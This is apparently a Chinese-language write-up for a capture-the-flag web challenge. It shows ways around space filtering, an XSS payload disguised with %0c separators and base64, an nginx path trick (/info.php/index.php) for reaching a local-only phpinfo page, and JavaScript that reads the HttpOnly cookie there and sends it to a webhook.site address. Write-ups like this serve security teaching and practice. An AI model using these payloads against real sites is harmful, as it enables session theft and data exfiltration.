hello
绕过空格过滤
%09 /t 水平定位符号即tab
%0a /n 换行键
%0c 换页符
%0d /r CR(字符)
<img%0Csrc=1%0Conerror=eval(String.fromCharCode())%0c>
Cookie设置了httponly,不能用document.cookie获取
考虑使用phpinfo页面来提取cookie信息。
但是info.php只允许本地访问。
根据nginx配置文件
user www-data;
worker_processes 1;
events {
worker_connections 1024;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
sendfile on;
keepalive_timeout 65;
server {
listen 80;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.php index.html index.htm;
}
location = /info.php {
allow 127.0.0.1;
deny all;
}
location ~ \.php$ {
root /usr/share/nginx/html;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
fastcgi_pass unix:/var/run/php/php8.2-fpm.sock;
}
}
}
使用info.php/index.php来绕过限制
参考文章
在php中会无视第二个php文件,指向第一个php文件。
同时这个路径又会绕过nginx的校验。
使用XMLHttpRequest如下格式
var req = new XMLHttpRequest();
req.onload = reqListener;
var url = 'http://idek-hello.chal.idek.team:1337/info.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();
function reqListener() {
var req2 = new XMLHttpRequest();
const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1 );
req2.open('GET', 'https://webhook.site/20962f32-4225-456a-83fb-769d5c10a23d/?data=' + btoa(sess), false);
req2.send()
};
使用cyberchef进行编码
http://idek-hello.chal.idek.team:1337/?name=%3Cimg%0Csrc=1%0Conerror=eval(String.fromCharCode(0x76,0x61,.....))%3E
使用fetch
fetch("/info.php/index.php").then(response => response.text()).then(data => fetch("https://webhook.site/20962f32-4225-456a-83fb-769d5c10a23d/?data="+btoa(data.substring(data.indexOf("HTTP_COOKIE"),data.indexOf("HTTP_COOKIE")+100)))
payload
<svg%0Conload=eval(atob("ZmV0Y2goIi9pbmZvLnBocC9pbmRleC5waHAiKS50aGVuKHJlc3BvbnNlID0%2BIHJlc3BvbnNlLnRleHQoKSkudGhlbihkYXRhID0%2BIGZldGNoKCJodHRwczovL3dlYmhvb2suc2l0ZS8yMDk2MmYzMi00MjI1LTQ1NmEtODNmYi03NjlkNWMxMGEyM2QvP2RhdGE9IitidG9hKGRhdGEuc3Vic3RyaW5nKGRhdGEuaW5kZXhPZigiSFRUUF9DT09LSUUiKSxkYXRhLmluZGV4T2YoIkhUVFBfQ09PS0lFIikrMTAwKSkpKQ%3D%3D"))>